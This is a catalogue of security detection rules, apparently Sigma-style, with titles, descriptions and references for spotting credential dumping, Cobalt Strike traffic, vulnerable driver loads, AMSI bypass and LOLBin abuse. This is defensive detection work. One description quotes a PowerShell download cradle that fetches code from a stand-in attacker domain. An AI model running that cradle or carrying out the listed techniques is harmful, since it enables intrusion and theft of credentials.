  • New Github Organization Member Added
  • New Okta User Created
  • System and Hardware Information Discovery
  • System Shutdown/Reboot - Linux
  • File and Directory Discovery - Linux
  • File Deletion
  • System Information Discovery
  • System Network Discovery - Linux
  • File and Directory Discovery - MacOS
  • Local Groups Discovery - MacOs
  • Network Sniffing - MacOs
  • Macos Remote System Discovery
  • System Network Discovery - macOS
  • System Network Connections Discovery - MacOs
  • System Shutdown/Reboot - MacOs
  • Failed Code Integrity Checks
  • User Logoff Event
  • VSSAudit Security Event Source Registration
  • Locked Workstation
  • Windows Update Error
  • Windows Defender Malware Detection History Deletion
  • Windows Spooler Service Suspicious Binary Load
  • New PowerShell Instance Created
  • PowerShell Decompress Commands
  • Suspicious High IntegrityLevel Conhost Legacy Option
  • New Application in AppCompat
  • Potential BOINC Software Execution (UC-Berkeley Signature)
  • Suspicious Tasklist Discovery Command

Rule Details

Rule Title | Description | References
App Permissions Granted For Other APIs | Detects when app permissions (app roles) for other APIs are granted | https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-applications#application-granted-highly-privileged-permissions
Edit of .bash_profile and .bashrc | Detects changes to the user environment. Adversaries can insert code into these files to gain persistence each time a user logs in or opens a new shell. | MITRE ATT&CK technique T1156; .bash_profile and .bashrc.
OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd | Detects the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell. SCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager, Microsoft Azure, and Microsoft Operations Management Suite. | https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure, https://github.com/Azure/Azure-Sentinel/pull/3059
User Added To Admin Group - MacOS | Detects attempts to create and/or add an account to the admin group, thus granting admin privileges. | https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos, https://ss64.com/osx/dscl.html, https://ss64.com/osx/sysadminctl.html
Brute Force | Detects many authentication failures from one source to one destination, which may indicate brute-force activity | None
Domestic Kitten FurBall Malware Pattern | Detects specific malware patterns used by FurBall malware linked to the Iranian Domestic Kitten APT group | https://research.checkpoint.com/2021/domestic-kitten-an-inside-look-at-the-iranian-surveillance-operations/
CobaltStrike Malleable Amazon Browsing Traffic Profile | Detects the Malleable Amazon profile | https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/amazon.profile, https://www.hybrid-analysis.com/sample/ee5eca8648e45e2fea9dac0d920ef1a1792d8690c41ee7f20343de1927cc88b9?environmentId=100
CobaltStrike Malformed UAs in Malleable Profiles | Detects different malformed user agents used in Malleable profiles used with Cobalt Strike | https://github.com/yeyintminthuhtut/Malleable-C2-Profiles-Collection/
CobaltStrike Malleable (OCSP) Profile | Detects the Malleable (OCSP) profile with the typo (OSCP) in the URL | https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/ocsp.profile
CobaltStrike Malleable OneDrive Browsing Traffic Profile | Detects the Malleable OneDrive profile | https://github.com/rsmudge/Malleable-C2-Profiles/blob/26323784672913923d20c5a638c6ca79459e8529/normal/onedrive_getonly.profile
iOS Implant URL Pattern | Detects the URL pattern used by the iOS implant | https://googleprojectzero.blogspot.com/2019/08/implant-teardown.html, https://twitter.com/craiu/status/1167358457344925696
Search-ms and WebDAV Suspicious Indicators in URL | Detects URL patterns used by search(-ms)/WebDAV initial access campaigns. | https://www.trellix.com/en-us/about/newsroom/stories/research/beyond-file-search-a-novel-method.html, https://micahbabinski.medium.com/search-ms-webdav-and-chill-99c5b23ac462
Suspicious Remote Thread Target | Offensive tradecraft is moving away from APIs like "CreateRemoteThread", but the technique is still widely observed in the wild. This rule detects processes that should not behave this way (such as winword.exe or outlook.exe) creating remote threads in other processes. It is a generic rule, but the selected range of processes should keep the false-positive rate low. | https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
Credential Dumping Tools Service Execution | Detects execution of well-known credential dumping tools via service execution events | https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
Usage Of Malicious POORTRY Signed Driver | Detects the load of the signed POORTRY driver used by UNC3944, as reported by Mandiant and SentinelOne. | https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware
PowerShell Scripts Run by a Services | Detects a PowerShell script installed as a service | https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse
Vulnerable AVAST Anti Rootkit Driver Load | Detects the load of a signed and vulnerable Avast Anti Rootkit driver, often used by threat actors or malware to stop and disable AV and EDR products | https://www.aon.com/cyber-solutions/aon_cyber_labs/yours-truly-signed-av-driver-weaponizing-an-antivirus-driver/
Vulnerable Dell BIOS Update Driver Load | Detects the load of the vulnerable Dell BIOS update driver reported in CVE-2021-21551 | https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/
Vulnerable Driver Load By Name | Detects the load of known vulnerable drivers by file name only. | https://loldrivers.io/
Vulnerable GIGABYTE Driver Load | Detects the load of a signed and vulnerable GIGABYTE driver, often used by threat actors or malware for privilege escalation | https://medium.com/@fsx30/weaponizing-vulnerable-driver-for-privilege-escalation-gigabyte-edition-e73ee523598b, https://twitter.com/malmoeb/status/1551449425842786306, https://github.com/fengjixuchui/gdrv-loader, https://www.virustotal.com/gui/file/31f4cfb4c71da44120752721103a16512444c13c2ac2d857a7e6f13cb679b427/details, https://www.virustotal.com/gui/file/cfc5c585dd4e592dd1a08887ded28b92d9a5820587b6f4f8fa4f56d60289259b/details
Vulnerable HW Driver Load | Detects the load of a legitimately signed driver named HW.sys, often used by threat actors or malware for privilege escalation | https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/, https://www.virustotal.com/gui/file/6a4875ae86131a594019dec4abd46ac6ba47e57a88287b814d07d929858fe3e5/details
Vulnerable Lenovo Driver Load | Detects the load of the vulnerable Lenovo driver reported in CVE-2022-3699, which can be used to escalate privileges | https://support.lenovo.com/de/en/product_security/ps500533-lenovo-diagnostics-vulnerabilities, https://github.com/alfarom256/CVE-2022-3699/
Suspicious File Event With Teams Objects | Detects access to the authentication tokens and accounts of the Microsoft Teams desktop application. | https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/, https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens
Suspicious Unattend.xml File Access | Detects attempts to access unattend.xml in the Panther directory, where installation logs are stored. These files hold the credentials/answers used during the unattended Windows install process, so if they still exist their contents can be read. | https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md
CrackMapExec File Creation Patterns | Detects suspicious file creation patterns found in logs when CrackMapExec is used | https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass
LSASS Memory Dump File Creation | Detects LSASS memory dump creation using operating system utilities. Procdump uses the process name in the output file name if no name is specified | https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment
CreateMiniDump Hacktool | Detects the use of the CreateMiniDump hack tool, used to dump LSASS process memory for credential extraction on the attacker's machine | https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass
Mimikatz MemSSP Default Log File Creation | Detects Mimikatz MemSSP default log file creation | https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
Alternate PowerShell Hosts - Image | Detects alternate PowerShell hosts, potentially bypassing detections that look for powershell.exe | https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html
Suspicious CLR Logs Creation | Detects suspicious .NET assembly executions via CLR usage log creation. Could detect use of Cobalt Strike's execute-assembly command. | https://web.archive.org/web/20230329154538/https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html, https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/, https://github.com/olafhartong/sysmon-modular/blob/5e5f6d90819a7f35eec0aba08021d0d201bb9055/11_file_create/include_dotnet.xml
Suspicious Load of Advapi31.dll | Detects the load of advapi31.dll by a process running in an uncommon folder | https://github.com/hlldz/Phant0m
SCM DLL Sideload | Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) and do not exist on a typical modern system | https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992
Svchost DLL Search Order Hijack | Detects DLL search-order hijacking of DLLs loaded by the SCM for the IKEEXT and SessionEnv services, which call LoadLibrary on files that do not exist within C:\Windows\System32\ by default. An attacker can place malicious logic in the PROCESS_ATTACH block of their library and restart the services ("svchost.exe -k netsvcs") to gain code execution on a remote machine. | https://decoded.avast.io/martinchlumecky/png-steganography/, https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992
Possible Process Hollowing Image Loading | Detects loading of samlib.dll or WinSCard.dll from an untypical process, e.g. through process hollowing by Mimikatz | https://web.archive.org/web/20220815065318/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html
Windows Management Instrumentation DLL Loaded Via Microsoft Word | Detects DLLs loaded via Word documents containing VBA macros that execute WMI commands | https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16, https://www.carbonblack.com/2019/04/24/cb-tau-threat-intelligence-notification-emotet-utilizing-wmi-to-launch-powershell-encoded-code/, https://media.cert.europa.eu/static/SecurityAdvisories/2019/CERT-EU-SA2019-021.pdf
Microsoft Binary Github Communication | Detects an executable in the Windows folder accessing github.com | https://twitter.com/M_haggis/status/900741347035889665, https://twitter.com/M_haggis/status/1032799638213066752, https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1
Suspicious Non-Browser Network Communication With Reddit API | Detects a non-browser process interacting with the Reddit API, which could indicate use of a covert C2 such as RedditC2 | https://github.com/kleiton0x00/RedditC2, https://twitter.com/kleiton0x7e/status/1600567316810551296, https://www.linkedin.com/posts/kleiton-kurti_github-kleiton0x00redditc2-abusing-reddit-activity-7009939662462984192-5DbI/?originalSubdomain=al
Suspicious Epmap Connection | Detects a suspicious "epmap" connection to a remote computer via remote procedure call (RPC) | https://github.com/RiccardoAncarani/TaskShell/
PsExec Pipes Artifacts | Detects use of PsExec via creation of and access to its named pipes | https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
Netcat The Powershell Version - PowerShell Module | Adversaries may use a non-application-layer protocol for communication between host and C2 server or among infected hosts within a network | https://nmap.org/ncat/, https://github.com/besimorhino/powercat, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md
Accessing Encrypted Credentials from Google Chrome Login Database | Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store. | https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md
AzureHound PowerShell Commands | Detects the execution of AzureHound in PowerShell, a tool to gather data from Azure for BloodHound | https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1, https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html
Execution via CL_Invocation.ps1 - Powershell | Detects execution via SyncInvoke in the CL_Invocation.ps1 module | https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/, https://twitter.com/bohops/status/948061991012327424
Execution via CL_Mutexverifiers.ps1 | Detects execution via runAfterCancelProcess in the CL_Mutexverifiers.ps1 module | https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/, https://twitter.com/pabraeken/status/995111125447577600
Powershell File and Directory Discovery | Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery (https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. | https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md
Dnscat Execution | Detects execution of the Dnscat exfiltration tool | None
PrintNightmare Powershell Exploitation | Detects the cmdlet name used for PrintNightmare exploitation. | https://github.com/calebstewart/CVE-2021-1675
Suspicious Get-WmiObject | Detects suspicious use of the Get-WmiObject cmdlet. WMI is the infrastructure for management data and operations that enables local and remote management of Windows personal computers and servers | https://attack.mitre.org/datasources/DS0005/, https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7
Suspicious PowerShell Download | Detects suspicious PowerShell download commands | None
Suspicious PowerShell Invocations - Generic Detects suspicious PowerShell invocation command parameters None
Suspicious PowerShell Invocations - Specific Detects suspicious PowerShell invocation command parameters None
SyncAppvPublishingServer Execution to Bypass Powershell Restriction Detects SyncAppvPublishingServer process execution, which is usually utilized by adversaries to bypass PowerShell execution restrictions. https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/
Suspicious In-Memory Module Execution Detects the access to processes by other suspicious processes which have reflectively loaded libraries in their memory space. An example is SilentTrinity C2 behaviour. Generally speaking, when Sysmon EventID 10 cannot reference a stack call to a dll loaded from disk (the standard way), it will display "UNKNOWN" as the module name. Usually this means the stack call points to a module that was reflectively loaded in memory. Adding to this, it is not common to see such few calls in the stack (ntdll.dll --> kernelbase.dll --> unknown) which essentially means that most of the functions required by the process to execute certain routines are already present in memory, not requiring any calls to external libraries. The latter should also be considered suspicious. https://azure.microsoft.com/en-ca/blog/detecting-in-memory-attacks-with-sysmon-and-azure-security-center/
Credential Dumping by LaZagne Detects LSASS process access by LaZagne for credential dumping. https://twitter.com/bh4b3sh/status/1303674603819081728
Credential Dumping Tools Accessing LSASS Memory Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools https://onedrive.live.com/view.aspx?resid=D026B4699190F1E6!2843&ithint=file%2cpptx&app=PowerPoint&authkey=!AMvCRTKB_V1J5ow, https://web.archive.org/web/20230208123920/https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for_22.html, https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment, https://web.archive.org/web/20230420013146/http://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf
Credential Dumping by Pypykatz Detects LSASS process access by pypykatz for credential dumping. https://github.com/skelsec/pypykatz
Potential NT API Stub Patching Detects potential NT API stub patching as seen used by the project PatchingAPI https://web.archive.org/web/20230106211702/https://github.com/D1rkMtr/UnhookingPatch, https://twitter.com/D1rkMtr/status/1611471891193298944?s=20
APT29 This method detects a suspicious PowerShell command line combination as used by APT29 in a campaign against U.S. think tanks. https://www.microsoft.com/security/blog/2018/12/03/analysis-of-cyberattack-on-u-s-think-tanks-non-profits-public-sector-by-unidentified-attackers/, https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html
CrackMapExecWin Detects CrackMapExecWin Activity as Described by NCSC https://www.ncsc.gov.uk/alerts/hostile-state-actors-compromising-uk-organisations-focus-engineering-and-industrial-control, https://attack.mitre.org/software/S0488/
GALLIUM Artefacts Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019. https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/, https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn800669(v=ws.11)
Suspicious Certutil Command Usage Detects a suspicious Microsoft certutil execution with sub commands like 'decode' sub command, which is sometimes used to decode malicious code https://twitter.com/JohnLaTwC/status/835149808817991680, https://blogs.technet.microsoft.com/pki/2006/11/30/basic-crl-checking-with-certutil/, https://www.trustedsec.com/2017/07/new-tool-release-nps_payload/, https://twitter.com/egre55/status/1087685529016193025, https://lolbas-project.github.io/lolbas/Binaries/Certutil/
Hurricane Panda Activity Detects Hurricane Panda Activity https://www.crowdstrike.com/blog/crowdstrike-discovers-use-64-bit-zero-day-privilege-escalation-exploit-cve-2014-4113-hurricane-panda/
Lazarus Activity Apr21 Detects different process creation events as described in Malwarebytes's threat report on Lazarus group activity https://blog.malwarebytes.com/malwarebytes-news/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat/
Lazarus Loaders Detects different loaders as described in various threat reports on Lazarus group activity https://www.hvs-consulting.de/lazarus-report/, https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
DNS Tunnel Technique from MuddyWater Detecting DNS tunnel activity for Muddywater actor https://www.virustotal.com/gui/file/5ad401c3a568bd87dd13f8a9ddc4e450ece61cd9ce4d1b23f68ce0b1f3c190b7/, https://www.vmray.com/analyses/5ad401c3a568/report/overview.html
TA505 Dropper Load Pattern Detects mshta loaded by wmiprvse as parent as used by TA505 malicious documents https://twitter.com/ForensicITGuy/status/1334734244120309760
Read and Execute a File Via Cmd.exe Detect use of "/R <" to read and execute a file via cmd.exe https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1059.003/T1059.003.md
Cmd Stream Redirection Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt
Credential Acquisition via Registry Hive Dumping Detects Credential Acquisition via Registry Hive Dumping https://www.elastic.co/guide/en/security/current/credential-acquisition-via-registry-hive-dumping.html
Visual Basic Script Execution Adversaries may abuse Visual Basic (VB) for execution https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.005/T1059.005.md
Execution via MSSQL Xp_cmdshell Stored Procedure Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default. https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html
Indirect Command Execution via Forfiles Detects execution of commands and binaries from the context of "forfiles.exe". This can be used as a LOLBIN in order to bypass application whitelisting. https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a, https://lolbas-project.github.io/lolbas/Binaries/Forfiles/
Indirect Command Execution Detect indirect command execution via Program Compatibility Assistant (pcalua.exe or forfiles.exe). https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1202/T1202.md, https://eqllib.readthedocs.io/en/latest/analytics/884a7ccd-7305-4130-82d0-d4f90bc118b6.html
Invoke-Obfuscation RUNDLL LAUNCHER Detects Obfuscated Powershell via RUNDLL LAUNCHER https://github.com/SigmaHQ/sigma/issues/1009
Invoke-Obfuscation Via Use Rundll32 Detects Obfuscated Powershell via use Rundll32 in Scripts https://github.com/SigmaHQ/sigma/issues/1009
New Lolbin Process by Office Applications This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml, https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml, https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A, https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set
Monitoring Wuauclt.exe For Lolbas Execution Of DLL Adversaries can abuse wuauclt.exe (Windows Update client) to achieve code execution by specifying an arbitrary DLL. https://dtm.uk/wuauclt/
Abusing Findstr for Defense Evasion Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism https://lolbas-project.github.io/lolbas/Binaries/Findstr/, https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/, https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Suspicious File Download Using Office Application Detects the usage of one of three Microsoft office applications (Word, Excel, PowerPoint) to download arbitrary files https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/, https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Execute MSDT.EXE Using Diagcab File Detects diagcab leveraging the "ms-msdt" handler or the "msdt.exe" binary to execute arbitrary commands as seen in CVE-2022-30190 https://github.com/GossiTheDog/ThreatHunting/blob/e85884abbf05d5b41efc809ea6532b10b45bd05c/AdvancedHuntingQueries/DogWalk-DiagCab, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-9015912909545e72ed42cbac4d1e96295e8964579c406d23fd9c47a8091576a0, https://irsl.medium.com/the-trouble-with-microsofts-troubleshooters-6e32fc80b8bd
Ryuk Ransomware Command Line Activity Detects Ryuk Ransomware command lines https://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/
MavInject Process Injection Detects process injection using the signed Windows tool Mavinject32.exe https://twitter.com/gN3mes1s/status/941315826107510784, https://reaqta.com/2017/12/mavinject-microsoft-injector/, https://twitter.com/Hexacorn/status/776122138063409152
Process Memory Dumped Via RdrLeakDiag.EXE Detects use of the rdrleakdiag.exe LOLBIN utility to dump process memory https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/
Trickbot Malware Reconnaissance Activity Detects potential reconnaissance activity used by Trickbot malware. Trickbot enumerates domain/network topology and executes certain commands automatically every few minutes. https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/, https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/
New Service Creation Detects creation of a new service. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md
Nslookup PwSh Download Cradle This rule tries to detect powershell download cradles, e.g. powershell . (nslookup -q=txt http://some.owned.domain.com)[-1] https://twitter.com/alh4zr3d/status/1566489367232651264
Application Whitelisting Bypass via DLL Loaded by odbcconf.exe Detects defence evasion attempt via odbcconf.exe execution to load DLL https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://twitter.com/Hexacorn/status/1187143326673330176, https://redcanary.com/blog/raspberry-robin/, https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-94a1964b682707e4e3f77dd61a3bfface5401d08d8cf81145f388e09614aceca
Excel Proxy Executing Regsvr32 With Payload Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in the command line with parent Office application processes. https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
Excel Proxy Executing Regsvr32 With Payload Alternate Excel called wmic to finally proxy execute regsvr32 with the payload. An attacker wanted to break the suspicious parent-child chain (Office app spawns LOLBin). But we have the command line in the event, which allows us to "restore" this suspicious parent-child chain and detect it. Monitor process creation with "wmic process call create" and LOLBins in the command line with parent Office application processes. https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
Office Applications Spawning Wmi Cli Alternate Initial execution of malicious document calls wmic to execute the file with regsvr32 https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml
Possible Applocker Bypass Detects execution of executables that can be used to bypass Applocker whitelisting https://github.com/carnal0wnage/ApplicationWhitelistBypassTechniques/blob/b348846a3bd2ff45e3616d63a4c2b4426f84772c/TheList.txt, https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1127.001/T1127.001.md
PowerShell AMSI Bypass Pattern Detects attempts to disable AMSI in the command line. It is possible to bypass AMSI by disabling it before loading the main payload. https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Base64 Encoded Listing of Shadowcopy Detects base64 encoded listing Win32_Shadowcopy https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar
Malicious Base64 Encoded Powershell Invoke Cmdlets Detects base64 encoded powershell cmdlet invocation of known suspicious cmdlets https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
Potential PowerShell Base64 Encoded Shellcode Detects potential powershell Base64 encoded Shellcode https://twitter.com/cyb3rops/status/1063072865992523776
Suspicious Bitsadmin Job via PowerShell Detect download by BITS jobs via PowerShell https://eqllib.readthedocs.io/en/latest/analytics/ec5180c9-721a-460f-bddc-27539a284273.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md
Stop Or Remove Antivirus Service Detects usage of 'Stop-Service' or 'Remove-Service' powershell cmdlet to disable AV services. Adversaries may disable security tools to avoid possible detection of their tools and activities by stopping antivirus service https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/
Potential Xor Encoded PowerShell Command Detects usage of "xor" or "bxor" in combination with a "foreach" loop. This pattern is often found in encoded PowerShell code and commands as a way to avoid detection https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65
Regsvr32 Anomaly Detects various anomalies in relation to regsvr32.exe https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html, https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/
Registry Dump of SAM Creds and Secrets Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through Windows Registry where the SAM database is stored https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets
Renamed PaExec Execution Detects execution of renamed paexec via imphash and executable product string sha256=01a461ad68d11b5b5096f45eb54df9ba62c5af413fa9eb544eacb598373a26bc, https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf
Renamed PsExec Detects the execution of a renamed PsExec often used by attackers or malware https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/megacortex-ransomware-spotted-attacking-enterprise-networks
Renamed PowerShell Detects the execution of a renamed PowerShell often used by attackers or malware https://twitter.com/christophetd/status/1164506034720952320
Renamed Rundll32.exe Execution Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/
Root Certificate Installed Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md
Rundll32 JS RunHTMLApplication Pattern Detects suspicious command line patterns used when rundll32 is used to run JavaScript code http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt, https://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_TROJAN.WIN32.POWESSERE.G_MITIGATION_BYPASS_PART2.txt
Suspicious Rundll32 Script in CommandLine Detects suspicious process related to rundll32 based on arguments https://gist.github.com/ryhanson/227229866af52e2d963cf941af135a52, https://github.com/redcanaryco/atomic-red-team/blob/cd3690b100a495885c407282d0c94c85f48a8a2e/atomics/T1218.011/T1218.011.md
Run from a Zip File Payloads may be compressed, archived, or encrypted in order to avoid detection https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md#atomic-test-4---execution-from-compressed-file
